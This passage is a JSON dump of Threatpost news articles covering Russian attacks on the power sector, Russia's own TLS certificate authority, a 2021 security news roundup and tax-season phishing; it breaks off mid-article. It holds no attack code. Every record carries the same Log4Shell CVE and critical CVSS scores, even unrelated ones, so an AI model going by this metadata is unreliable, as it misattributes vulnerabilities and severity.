port open for remote desktop, then they need to add layers of compensating security controls to make sure it\u2019s not easy to exploit.\u201d\n\nWhen unsealing the indictments, the government noted that it\u2019s taking action to [enhance private sector network defense efforts](<https://www.cisa.gov/uscert/ncas/alerts/aa22-083a>) and to [disrupt similar malicious activity](<https://protect2.fireeye.com/v1/url?k=73f0be82-2c6b867e-73f79a67-ac1f6b01771c-a72e8f7b8ceb667b&q=1&e=d2252912-db07-4b30-8381-4dbd442acfc0&u=https%3A%2F%2Frewardsforjustice.net%2Findex%2F%3Fjsf%3Djet-engine%3Arewards-grid%26tax%3Dcyber%3A857>).\n\nOther security issues that Russian actors have leveraged, which companies need to address immediately before they are used for attacks that could be bigger than those we\u2019ve already seen, include:\n\n * **Default Passwords**: Exactly what it sounds like. Default passwords are a major attack vector. Not changing default passwords, especially with a tool like Telnet, leaves companies wide open to Russian access to networks.\n * [**Port 161 \u2013 SNMP protocol**](<https://www.cisa.gov/uscert/ncas/alerts/TA18-106A>): The Simple Network Management Protocol (SNMP) uses both port 161 and port 162 for sending commands and messages and is being used by Russia to gain access to network devices and infrastructure. Older versions of this protocol are unsecure and allow threat actors to eavesdrop or manipulate data.\n * **Port 139/445 \u2013 SMB: **The SMB network port is commonly used for file sharing. Russian groups have successfully targeted this port to execute remote code and to steal information, LookingGlass found.\n\nThese are just a few examples of security exposures that threat actors tied directly to Russia have exploited and will likely exploit again within U.S. companies, according to LookingGlass\u2019s research.\n\nIt\u2019s not time to wait for a nuclear-level cyber event, given that threat actors are already inside the power infrastructure. Now\u2019s the time for companies to find and mitigate the holes that let them in, Louie said.\n\n\u201cEnergy sector entities should be reviewing their digital footprint and taking action to secure their external-facing assets, especially as the threat of Russian cyberattacks intensifies,\u201d he said.\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-25T21:25:17", "type": "threatpost", "title": "DOJ Indicts Russian Gov\u2019t Employees Over Targeting Power Sector", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-25T21:25:17", "id": "THREATPOST:138507F793D8399AF0EE1640C46A9698", "href": "https://threatpost.com/doj-indicts-russian-govt-employees-over-targeting-power-sector/179108/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-11T18:35:15", "description": "Russia is offering its own trusted Transport Layer Security (TLS) certificate authority (CA) to replace certificates that need to be renewed by foreign countries. As it is, a pile of sanctions imposed in the wake of Russia\u2019s invasion of Ukraine is gumming up its citizen\u2019s access to websites.\n\nAs it is, Russian sites are stuck, unable to renew their certs because sanctions keep signing authorities in many countries unable to accept payments from Russia, according to[ BleepingComputer](<https://www.bleepingcomputer.com/news/security/russia-creates-its-own-tls-certificate-authority-to-bypass-sanctions/>).\n\nTLS \u2013 more commonly known as SSL, or TLS/SSL \u2013 is a cryptographic protocol that secures the internet by encrypting data sent between your browser, the websites you visit and the website\u2019s server. The certificates keep data transmission private and prevent modification, loss or theft, as digicert [explains](<https://www.digicert.com/tls-ssl/tls-ssl-certificates>).\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/11125728/how_TLS_certificates_work-e1647021505756.jpg)](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/11125728/how_TLS_certificates_work-e1647021505756.jpg>)\n\nHow TLS certificates work. Source: Digicert.\n\nAccording to a[ notice](<https://www.gosuslugi.ru/tls>) on Russia\u2019s public service portal, Gosuslugi, as shown in a translated version in this article\u2019s featured art, the certificates will replace foreign security certs if they expire or get yanked by foreign CAs. According to the portal, the service is available to all legal entities operating in Russia, with the certificates delivered to site owners upon request within five working days.\n\n## The \u2018Digital Iron Curtain\u2019\n\nOver the past two weeks, Russia\u2019s internet services have been cut off by multiple major U.S. internet suppliers, including [Cogent Communications](<https://www.siliconrepublic.com/comms/russia-internet-backbone-cogent-ukraine>), reportedly the second-largest internet carrier servicing Russia. Lumen, another major U.S. internet supplier, [followed suit](<https://www.washingtonpost.com/technology/2022/03/08/lumen-internet-russia-backbone-cut/>) on Tuesday, pushing the country\u2019s citizens behind what some analysts are calling \u201ca new digital Iron Curtain.\u201d\n\nMikhail Klimarev, executive director of the [Internet Protection Society](<https://2020.internethealthreport.org/>), which advocates for digital freedoms in Russia, told [The Washington Post](<https://www.washingtonpost.com/technology/2022/03/04/russia-ukraine-internet-cogent-cutoff/>) that he\u2019s \u201cvery afraid of this.\u201d\n\n\u201cI would like to convey to people all over the world that if you turn off the Internet in Russia, then this means cutting off 140 million people from at least some truthful information. As long as the Internet exists, people can find out the truth. There will be no Internet \u2014 all people in Russia will only listen to propaganda.\u201d\n\n## Chrome, Firefox, Edge Won\u2019t Swallow the New Certs\n\nBleepingComputer reported on Thursday that the only web browsers that were recognizing the new CA as trustworthy at the time were the Russia-based Yandex browser and Atom products: Russian users\u2019 only alternative to browsers such as Chrome, Firefox, Edge and others.\n\nSomebody with a Mozilla domain email on Thursday started a [thread](<https://groups.google.com/a/mozilla.org/g/dev-security-policy/c/QaKxfr5hOXg>) to discuss examination of the new root Russia cert, pointing to the possibility of the Russian government using it to start mand-in-the-middle (MitM) [attacks](<https://bugzilla.mozilla.org/show_bug.cgi?id=1758773>) \u2013 though, they said, none had been detected as of yesterday.\n\n\u201cAlthough at present there\u2019s no MitM, it\u2019s likely that government websites will start using this and once adoption is high enough Russia will perhaps start MitM,\u201d they said. They cited an ISP who said that it had been told that the new cert was mandatory, making the certificate \u201cworth urgent consideration.\u201d\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-11T18:34:34", "type": "threatpost", "title": "Russia Issues Its Own TLS Certs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-11T18:34:34", "id": "THREATPOST:F87A6E1CF3889C526FDE8CE50A1B81FF", "href": "https://threatpost.com/russia-issues-its-own-tls-certs/178891/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-27T23:43:39", "description": "As 2021 draws to a close, and the COVID-19 pandemic drags on, it\u2019s time to take stock of what resonated with our 1 million+ monthly visitors this year, with an eye to summing up some hot trends (gleaned from looking at the most-read stories on the Threatpost site).\n\nWhile 2020 was all about work-from-home security, COVID-19-themed social engineering and gaming (all driven by social changes during Year One of the pandemic), 2021 saw a distinctive shift in interest. Data insecurity, code-repository malware, major zero-day vulnerabilities and fresh ransomware tactics dominated the most-read list \u2013 perhaps indicating that people are keenly focused on cybercrime innovation as the \u201cnew normal\u201d for how we work becomes more settled in.\n\n_**Jump to section:**_\n\n 1. Data Leakapalooza\n 2. Major Zero-Day Vulnerabilities\n 3. Code Repository Malware\n 4. Ransomware Innovations\n 5. Gaming Attacks\n 6. Bonus! Zodiac Killer Cipher Cracked\n\n## **1\\. The Most-Read Story of 2021: Experian Leaks Everyone\u2019s Credit Scores**\n\nThere were obviously some huge news stories that dominated headlines during the year: Log4Shell; Colonial Pipeline; Kaseya; ProxyLogon/ProxyShell; SolarWinds. But judging from article traffic, readers were most interested in\u2026the Experian data exposure.\n\nIn April, Bill Demirkapi, a sophomore student at the Rochester Institute of Technology, discovered that the credit scores of almost every American [were exposed](<https://threatpost.com/experian-api-leaks-american-credit-scores/165731/>) through an API tool used by the Experian credit bureau, which he said was left open on a lender site without even basic security protections.[![](https://media.threatpost.com/wp-content/uploads/sites/103/2021/04/29144158/Experian-300x160.jpg)](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/04/29144158/Experian.jpg>)\n\nThe tool, called the Experian Connect API, allows lenders to automate FICO-score queries. Demirkapi said he was able to build a command-line tool that let him automate lookups for any credit score for nearly anyone, even after entering all zeros in the fields for date of birth, which he named, \u201cBill\u2019s Cool Credit Score Lookup Utility.\u201d\n\nIn addition to raw credit scores, the college student said that he was able to use the API connection to get \u201crisk factors\u201d from Experian that explained potential flaws in a person\u2019s credit history, such as \u201ctoo many consumer-finance company accounts.\u201d\n\nExperian, for its part, fixed the problem \u2013 and refuted concerns from the security community that the issue could be systemic.\n\nExperian wasn\u2019t the only household name that drew in readers for data insecurity: LinkedIn data going up for sale on the Dark Web was another very hot story this year.\n\n### **LinkedIn Data Scraping**\n\nAfter 500 million LinkedIn members were affected in a data-scraping incident in April, [it happened again](<https://threatpost.com/data-700m-linkedin-users-cyber-underground/167362/>) in June. A posting with 700 million LinkedIn records for sale appeared on popular cyberattacker destination RaidForums, by a hacker calling himself \u201cGOD User TomLiner.\u201d The advertisement included a sample of 1 million records as \u201cproof.\u201d\n\nPrivacy Sharks examined the free sample and saw that the records include full names, gender, email addresses, phone numbers and industry information. It\u2019s unclear what the origin of the data is \u2013 but the scraping of public profiles is a likely source. According to LinkedIn, no breach of its networks occurred.\n\nEven so, the security ramifications were significant, researchers said, in terms of the cache enabling brute-force cracking of account passwords, email and telephone scams, phishing attempts, identity theft and finally, the data could be a social-engineering goldmine. Sure, attackers could simply visit public profiles to target someone, but having so many records in one place could make it possible to automate targeted attacks using information about users\u2019 jobs and gender, among other details.\n\n## **2\\. Major Zero-Day Bugs**\n\nOK, this one\u2019s a perennial topic of fascination, but 2021 had some doozies, starting with Log4Shell.\n\n### **Log4Shell Threatens Basically All Web Servers in Existence**\n\nThe Log4Shell vulnerability is [an easily exploited flaw](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) in the ubiquitous Java logging library Apache Log4j could allow unauthenticated remote code execution (RCE) and complete server takeover \u2014 and it\u2019s still being actively exploited in the wild.[![](https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/21151757/Logs-300x200.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/21151757/Logs-e1640117899602.png>)\n\nThe flaw (CVE-2021-44228) first turned up on sites that cater to users of the world\u2019s favorite game, Minecraft. Apache rushed a patch but within a day or two, attacks became rampant as threat actors tried to exploit the new bug. From there, news of additional exploitation vectors, a second bug, various kinds of real-world attacks and the sheer enormity of the threat surface (the logging library is basically everywhere) dominated reader interest in December.\n\n### **NSO Group\u2019s Zero-Click Zero Day for Apple**\n\nIn September, a [zero-click zero-day](<https://threatpost.com/apple-emergency-fix-nso-zero-click-zero-day/169416/>) dubbed ForcedEntry be researchers was found, affecting all things Apple: iPhones, iPads, Macs and Watches. It turns out that it was being exploited by NSO Group to install the infamous Pegasus spyware.\n\nApple pushed out an emergency fix, but Citizen Lab had already observed the NSO Group targeting never-before-seen, zero-click exploit targeting iMessage to illegally spy on Bahraini activists.\n\nThe ForcedEntry exploit was particularly notable in that it was successfully deployed against the latest iOS versions \u2013 14.4 & 14.6 \u2013 blowing past Apple\u2019s new BlastDoor sandboxing feature to install spyware on the iPhones of the Bahraini activists.\n\n### **Giant Zero-Day Hole in Palo Alto Security Appliances**\n\nAnother zero-day item that garnered big reader interest was [the news](<https://threatpost.com/massive-zero-day-hole-found-in-palo-alto-security-appliances/176170/>) that researchers from Randori developed a working exploit to gain remote code execution (RCE) on Palo Alto Networks\u2019 GlobalProtect firewall, via the critical bug CVE 2021-3064.\n\nRandori researchers said that if an attacker successfully exploits the weakness, they can gain a shell on the targeted system, access sensitive configuration data, extract credentials and more. And after that, attackers can dance across a targeted organization, they said: \u201cOnce an attacker has control over the firewall, they will have visibility into the internal network and can proceed to move laterally.\u201d\n\nPalo Alto Networks patched the bug on the day of disclosure.\n\n### **The Great Google Memory Bug Zero-Day**\n\nIn March, Google [hurried out a fix](<https://threatpost.com/google-mac-windows-chrome-zero-day/164759/>) for a vulnerability in its Chrome browser that was under active attack. If exploited, the flaw could allow remote code-execution and denial-of-service attacks on affected systems. Readers flocked to the coverage of the issue.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2020/11/03120131/Google-Chrome-Browser-300x200.jpg)](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/11/03120131/Google-Chrome-Browser.jpg>)\n\nNew york, USA \u2013 july 26, 2019: Start google chrome application on computer macro close up view in pixel screen\n\nThe flaw is a use-after-free vulnerability, and specifically exists in Blink, the browser engine for Chrome developed as part of the Chromium project. Browser engines convert HTML documents and other web page resources into the visual representations viewable to end users.\n\n\u201cBy persuading a victim to visit a specially crafted website, a remote attacker could exploit this vulnerability to execute arbitrary code or cause a denial-of-service condition on the system,\u201d according to IBM X-Force\u2019s report on the bug.\n\n### **Dell Kernel-Privilege Bugs**\n\nEarlier this year, five high-severity security bugs that remained hidden for 12 years [were found](<https://threatpost.com/dell-kernel-privilege-bugs/165843/>) to exist in all Dell PCs, tablets and notebooks shipped since 2009. They allow the ability to bypass security products, execute code and pivot to other parts of the network for lateral movement, according to SentinelLabs.\n\nThe flaws lurked in Dell\u2019s firmware update driver, impacting potentially hundreds of millions of Dell desktops, laptops, notebooks and tablets, researchers said.\n\nThe multiple local privilege-escalation (LPE) bugs exist in the firmware update driver version 2.3 (dbutil_2_3.sys) module, which has been in use since 2009. The driver component handles Dell firmware updates via the Dell BIOS Utility, and it comes pre-installed on most Dell machines running Windows.\n\n## 3\\. Code Repositories and the Software Supply Chain\n\nThe software supply chain is anchored by open-source code repositories \u2013 centralized locations where developers can upload software packages for use by developers in building various applications, services and other projects. They include GitHub, as well as more specialized repositories like the Node.js package manager (npm) code repository for Java; RubyGems for the Ruby programming language; Python Package Index (PyPI) for Python; and others.\n\nThese package managers represent a supply-chain threat given that anyone can upload code to them, which can in turn be unwittingly used as building blocks in various applications. Any applications corrupted by malicious code can attack the programs\u2019 users.\n\nTo boot, a single malicious package can be baked into multiple different projects \u2013 infecting them with cryptominers, info-stealers and more, and making remediation a complex process.[![](https://media.threatpost.com/wp-content/uploads/sites/103/2018/09/27155850/threatlist-python-300x168.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/09/27155850/threatlist-python.png>)\n\nCybercriminals have swarmed to this attack surface, and readers in 2021 loved to hear about their exploits.\n\nFor instance, in December, a [series of 17 malicious packages](<https://threatpost.com/malicious-npm-code-packages-discord/176886/>) in npm were found; they were all built to target Discord, the virtual meeting platform used by 350 million users that enables communication via voice calls, video calls, text messaging and files. The coal was to steal Discord tokens, which can be used to take over accounts.\n\nAlso this month, three malicious packages hosted in the PyPI code repository [were uncovered](<https://threatpost.com/malicious-pypi-code-packages/176971/>), which collectively have more than 12,000 downloads \u2013 and presumably slithered into installations in various applications. The packages included one trojan for establishing a backdoor on victims\u2019 machines, and two info-stealers.\n\nResearchers also discovered last week that there were 17,000 unpatched Log4j Java packages in the Maven Central ecosystem, leaving massive supply-chain risk on the table from [Log4Shell exploits](<https://threatpost.com/new-log4shell-attack-vector-local-hosts/177128/>). It will likely take \u201cyears\u201d for it to be fixed across the ecosystem, [according](<https://threatpost.com/java-supply-chain-log4j-bug/177211/>) to Google\u2019s security team.\n\nUsing malicious packages as a cyberattack vector was a common theme earlier in the year too. Here\u2019s a rundown of other recent discoveries:\n\n * In January, other Discord-stealing malware [was discovered](<https://threatpost.com/discord-stealing-malware-npm-packages/163265/>) in three npm packages. One, \u201can0n-chat-lib\u201d had no legitimate \u201ctwin\u201d package, but the other two made use of brandjacking and typosquatting to lure developers into thinking they\u2019re legitimate. The \u201cdiscord-fix\u201d malicious component is named to be similar to the legitimate \u201cdiscord-XP,\u201d an XP framework for Discord bots. The \u201csonatype\u201d package meanwhile made use of pure brandjacking.\n * In March, researchers [spotted](<https://threatpost.com/malicious-code-bombs-amazon-lyft-slack-zillow/164455/>) malicious packages targeting internal applications for Amazon, Lyft, Slack and Zillow (among others) inside the npm public code repository \u2013 all of which exfiltrated sensitive information.\n * That March attack was based on research from security researcher Alex Birsan, who found that it\u2019s possible to [inject malicious code](<https://threatpost.com/supply-chain-hack-paypal-microsoft-apple/163814/>) into common tools for installing dependencies in developer projects. Such projects typically use public repositories from sites like GitHub. The malicious code then can use these dependencies to propagate malware through a targeted company\u2019s internal applications and systems. The novel supply-chain attack was (ethically) used to breached the systems of more than 35 technology players, including Microsoft, Apple, PayPal, Shopify, Netflix, Tesla and Uber, by exploiting public, open-source developer tools.\n * In June, a group of cryptominers was found [to have infiltrated](<https://threatpost.com/cryptominers-python-supply-chain/167135/>) the PyPI. Researchers found six different malicious packages hiding there, which had a collective 5,000 downloads.\n * In July, a credentials-stealing package that uses legitimate password-recovery tools in Google\u2019s Chrome web browser [was found lurking in ](<https://threatpost.com/npm-package-steals-chrome-passwords/168004/>)npm. Researchers caught the malware filching credentials from Chrome on Windows systems. The password-stealer is multifunctional: It also listens for incoming commands from the attacker\u2019s command-and-control (C2) server and can upload files, record from a victim\u2019s screen and camera, and execute shell commands.\n\n## **4\\. Interesting Ransomware Variants**\n\nThe ransomware epidemic matured in 2021, with the actual malware used to lock up files progressing beyond simply slapping an extension on targeted folders. Readers flocked to malware analysis stories covering advancements in ransomware strains, including the following Top 3 discoveries.\n\n### **HelloKitty\u2019s Linux Variant Targets VMs**\n\nIn June, for the first time, researchers [publicly spotted](<https://threatpost.com/linux-variant-of-hellokitty-ransomware-targets-vmware-esxi-servers/167883/>) a Linux encryptor \u2013 being used by the HelloKitty ransomware gang.\n\nHelloKitty, the same group behind the [February attack](<https://threatpost.com/cyberpunk-2077-publisher-hack-ransomware/163775/>) on videogame developer CD Projekt Red, has developed numerous Linux ELF-64 versions of its ransomware, which it used to target VMware ESXi servers and virtual machines (VMs) running on them.[![](https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/16162559/hellokitty-300x169.jpeg)](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/16162559/hellokitty-e1626467172148.jpeg>)\n\nVMware ESXi, formerly known as ESX, is a bare-metal hypervisor that installs easily onto servers and partitions them into multiple VMs. While that makes it easy for multiple VMs to share the same hard-drive storage, it sets systems up to be one-stop shopping spots for attacks, since attackers can encrypt the centralized virtual hard drives used to store data from across VMs.\n\nDirk Schrader of New Net Technologies (NNT) told Threatpost that on top of the attraction of ESXi servers as a target, \u201cgoing that extra mile to add Linux as the origin of many virtualization platforms to [malware\u2019s] functionality\u201d has the welcome side effect of enabling attacks on any Linux machine.\n\n### **MosesStaff: No Decryption Available**\n\nA politically motivated group known as MosesStaff [was seen in November](<https://threatpost.com/mosesstaff-locks-targets-ransom-decryption/176366/>) paralyzing Israeli entities with no financial goal \u2013 and no intention of handing over decryption keys. Instead, it was using ransomware in politically motivated, destructive attacks at Israeli targets, looking to inflict the most damage possible.\n\nMosesStaff encrypts networks and steals information, with no intention of demanding a ransom or rectifying the damage. The group also maintains an active social-media presence, pushing provocative messages and videos across its channels, and making its intentions known.\n\n### **Epsilon Red Targets Exchange Servers**\n\nThreat actors in June [were seen deploying](<https://threatpost.com/exchange-servers-epsilon-red-ransomware/166640/>) new ransomware on the back of a set of PowerShell scripts developed for exploiting flaws in unpatched Exchange Servers.\n\nThe Epsilon Red ransomware \u2013 a reference to an obscure enemy character in the X-Men Marvel comics, a super soldier of Russian origin armed with four mechanical tentacles \u2013 was discovered after an attack on a U.S.-based company in the hospitality sector.\n\nResearchers said the ransomware was different in the way it spreads its hooks into a corporate network. While the malware itself is a \u201cbare-bones\u201d 64-bit Windows executable programmed in the Go programming language, its delivery system relies on a series of PowerShell scripts that \u201cprepared the attacked machines for the final ransomware payload and ultimately delivered and initiated it,\u201d they wrote.\n\n## **5\\. Gaming Security**\n\nFor the second year in a row, gaming security was on the radar for readers in 2021, possibly because cybercriminals continue to target this area as result of the global COVID-19 pandemic driving higher volumes of play. In a recent survey by Kaspersky, nearly 61 percent reported suffering foul play such as ID theft, scams or the hack of in-game valuables. Some of the most popular articles are recapped below.\n\n### **Steam Used to Host Malware**\n\nIn June, the appropriately named SteamHide malware [emerged](<https://threatpost.com/steam-gaming-delivering-malware/166784/>), which disguises itself inside profile images on the gaming platform Steam.[![](https://media.threatpost.com/wp-content/uploads/sites/103/2018/08/01084854/Steam-logo-300x169.jpg)](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/08/01084854/Steam-logo.jpg>)\n\nThe Steam platform merely serves as a vehicle which hosts the malicious file, according to research from G Data: \u201cThe heavy lifting in the shape of downloading, unpacking and executing a malicious payload fetched by the loader is handled by an external component, which accesses the malicious profile image on one Steam profile. This external payload can be distributed via crafted emails to compromised websites.\u201d\n\nThe steganography technique is obviously not new \u2014 but Steam profiles being used as attacker-controlled hosting sites, is \u2013 and readers\u2019 ears perked up in a big way when we posted the story.\n\n### **Twitch Source-Code Leak**\n\nIn October, an anonymous user posted a link to a 125GB torrent on 4chan, containing all of Twitch\u2019s source code, comments going back to its inception, user-payout information and more.\n\nThe attacker [claimed to have ransacked](<https://threatpost.com/twitch-source-code-leaked/175359/>) the live gameplay-streaming platform for everything it\u2019s got; Twitch confirmed the breach not long after.\n\nThe threat actor rationalized gutting the service by saying that the Twitch community needs to have the wind knocked out of its lungs. They called the leak a means to \u201cfoster more disruption and competition in the online-video streaming space,\u201d because \u201ctheir community is a disgusting toxic cesspool.\u201d\n\n### **Steam-Stealing Discord Scams**\n\nIn November, a scam started making the rounds on Discord, through which cybercriminals could harvest Steam account information and make off with any value the account contained.\n\nGamer-aimed Discord scams are just about everywhere. But researchers [flagged a new approach](<https://threatpost.com/free-discord-nitro-offer-steam-credentials/176011/>) as noteworthy because it crossed over between Discord and the Stream gaming platform, with crooks offering a purported free subscription to Nitro (a Discord add-on that enables avatars, custom emoji, profile badges, bigger uploads, server boosts and so on), in exchange for \u201clinking\u201d the two accounts.[![](https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/04113440/nitro-fake-discord-website-600x324-1-300x162.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/04113440/nitro-fake-discord-website-600x324-1.png>)\n\nThe target is first served a malicious direct message on Discord with the fake offer. \u201cJust link your Steam account and enjoy,\u201d the message said, which included a link to purportedly do just that. The malicious link takes users to a spoofed Discord page with a button that reads, \u201cGet Nitro.\u201d Once a victim clicks on the button, the site appears to serve a Steam pop-up ad, but researchers explained the ad is still part of the same malicious site.\n\nThe gambit is intended to fool users into thinking they\u2019re being taken to the Steam platform to enter in their login information \u2014 in reality, the crooks are poised to harvest the credentials.\n\n### **Sony PlayStation3 Bans**\n\nIn June, a reported breach of a Sony folder containing the serial ID numbers for every PlayStation3 console out there [appeared to](<https://threatpost.com/ps3-players-ban-attacks-gaming/167303/>) have led to users being inexplicably banned from the platform.\n\nSony reportedly left a folder with every PS3 console ID online unsecured, and it was discovered and reported by a Spanish YouTuber with the handle \u201cThe WizWiki\u201d in mid-April. In June, players on PlayStation Network message boards began complaining that they couldn\u2019t sign on.\n\nUsers mused that threat actors started using the stolen PS3 console IDs for malicious purposes, causing the legitimate players to get banned. But Sony didn\u2019t confirm a connection between the PS3 ID breach and player reports of being locked out of the platform.\n\n## **Bonus Item: Zodiac Killer Cipher \u2013 Revealed!!**\n\nOne of the quirky stories that made it into the Top 10 most-read Threatpost stories for 2021 concerned the cracking of the Zodiac\u2019s serial killer\u2019s 340 cipher, which couldn\u2019t be solved for 50 years. \nIn December 2020, the code [was cracked](<https://threatpost.com/cryptologists-zodiac-killer-340-cipher/162353/>) by a team of mathematicians.\n\nThe Zodiac serial killer is believed to have murdered at least five people \u2014 and likely more \u2014 in and around the Northern California area in the late 1960s and early 1970s. The still-unnamed murderer sent a series of four coded messages to local newspaper outlets, bragging about his crimes and containing cryptic icons, which earned him the moniker \u201cZodiac.\u201d[![](https://media.threatpost.com/wp-content/uploads/sites/103/2020/12/17122725/Zodiac-300x200.jpg)](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/12/17122725/Zodiac-e1608226062664.jpg>)\n\nThe first cipher was quickly decoded. But the second, the 340 Cipher, named after its 340 characters, was trickier to figure out. Australian-based mathematician Sam Blake calculated that there were 650,000 possible ways to read the code, and Jarl Van Eycke, whose day job is as a warehouse operator in Belgium, wrote a code-breaking software to tackle decryption. Soon, their unique algorithmic approach paid off. The message, officially recognized by the FBI as correct, reads:\n\n\u201cI HOPE YOU ARE HAVING LOTS OF FUN IN TRYING TO CATCH ME THAT WASNT ME ON THE TV SHOW WHICH BRINGS UP A POINT ABOUT ME I AM NOT AFRAID OF THE GAS CHAMBER BECAUSE IT WILL SEND ME TO PARADICE ALL THE SOONER BECAUSE I NOW HAVE ENOUGH SLAVES TO WORK FOR ME WHERE EVERYONE ELSE HAS NOTHING WHEN THEY REACH PARADICE SO THEY ARE AFRAID OF DEATH I AM NOT AFRAID BECAUSE I KNOW THAT MY NEW LIFE IS LIFE WILL BE AN EASY ONE IN PARADICE DEATH.\u201d\n\nWhile the name of the elusive serial killer remains hidden, the breakthrough represents a triumph for cryptology and the basic building blocks of cybersecurity \u2014 access control and segmentation.\n\n**_Check out our free _**[**_upcoming live and on-demand online town halls_**](<https://threatpost.com/category/webinars/>) **_\u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-27T18:57:24", "type": "threatpost", "title": "The 5 Most-Wanted Threatpost Stories of 2021", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-27T18:57:24", "id": "THREATPOST:8FFF44C70736D8E21796B9337E52F29D", "href": "https://threatpost.com/5-top-threatpost-stories-2021/177278/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-24T14:53:48", "description": "Threat actors have new targets in their sites this tax season during the annual barrage of cyber-scams as people file their U.S. income-tax documents. Novel email campaigns are spoofing popular financial technology (fintech) applications and their tax notifications to try to dupe victims into giving up their credentials, researchers have found.\n\nIt\u2019s common for attackers to target popular tax filing and preparation apps such as [Intuit](<https://threatpost.com/attackers-intuit-cancel-tax-accounts/178219/>) and TurboTax in various cybercriminal campaigns during tax season, a time that\u2019s traditionally rife with scams. In 2020, for example, threat actors [targeted small tax-preparation](<https://threatpost.com/latest-tax-scam-target-apps-and-tax-prep-websites/152998/>) firms by planting malicious code on their websites to spread malware to site users.\n\nThis year, attackers have pivoted to take on the personas of fintech apps like [Stash](<https://www.stash.com/>) and [Public](<https://public.com/>) \u201cto steal credentials and give users a false sense of security that they\u2019ve compiled the right tax documents,\u201d according to[ a report](<https://www.avanan.com/blog/hackers-begin-spoofing-fintech-apps-as-tax-season-approaches>) published Thursday by Avanan, a Check Point company.\n\nIn scams observed by Avanan researchers beginning 